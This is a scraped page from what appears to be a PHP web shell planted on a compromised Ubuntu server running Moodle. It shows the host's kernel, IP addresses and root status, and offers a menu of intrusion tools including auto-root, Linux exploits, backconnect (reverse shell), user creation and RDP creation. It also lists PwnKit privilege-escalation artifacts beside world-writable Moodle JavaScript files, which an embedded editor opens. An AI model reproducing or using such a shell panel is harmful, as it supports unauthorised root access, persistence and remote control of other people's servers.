Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
form /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
defaultcustom.min.js
1.39
KB
-rwxrwxrwx
defaultcustom.min.js.map
3.54
KB
-rwxrwxrwx
events.min.js
1.43
KB
-rwxrwxrwx
events.min.js.map
3.41
KB
-rwxrwxrwx
filetypes.min.js
5.36
KB
-rwxrwxrwx
filetypes.min.js.map
15.51
KB
-rwxrwxrwx
passwordunmask.min.js
4.32
KB
-rwxrwxrwx
passwordunmask.min.js.map
13.73
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
showadvanced.min.js
3.8
KB
-rwxrwxrwx
showadvanced.min.js.map
10.95
KB
-rwxrwxrwx
submit.min.js
1.81
KB
-rwxrwxrwx
submit.min.js.map
6.14
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : submit.min.js
define("core_form/submit",["exports","core_form/events"],(function(_exports,_events){Object.defineProperty(_exports,"__esModule",{value:!0}),_exports.init=void 0; /** * Submit button JavaScript. All submit buttons will be automatically disabled once the form is * submitted, unless that submission results in an error/cancelling the submit. * * @module core_form/submit * @package core_form * @copyright 2019 The Open University * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later * @since 3.8 */ var cookieListener=0,cookieListeningButtons=[],getCookieName=function(){return"moodledownload_"+M.cfg.sesskey},clearDownloadCookie=function(){document.cookie=encodeURIComponent(getCookieName())+"=deleted; expires="+new Date(0).toUTCString()};_exports.init=function(elementId){var button=document.getElementById(elementId);document.addEventListener(_events.formEventTypes.uploadStarted,(function(e){window.console.log(e.target),button.disabled=!0})),document.addEventListener(_events.formEventTypes.uploadCompleted,(function(e){window.console.log(e.target),button.disabled=!1})),"off"!==button.form.dataset.doubleSubmitProtection&&button.form.addEventListener("submit",(function(event){var disableAction=function(){event.defaultPrevented||button.disabled||(button.disabled=!0,clearDownloadCookie(),function(button){cookieListeningButtons.push(button),cookieListener||(cookieListener=setInterval((function(){2==document.cookie.split(getCookieName()+"=").length&&(clearDownloadCookie(),clearInterval(cookieListener),cookieListener=0,cookieListeningButtons.forEach((function(button){button.disabled=!1})))}),500))}(button))};window.addEventListener("beforeunload",disableAction),setTimeout((function(){window.removeEventListener("beforeunload",disableAction)}),0)}),!1)}})); //# sourceMappingURL=submit.min.js.map
Close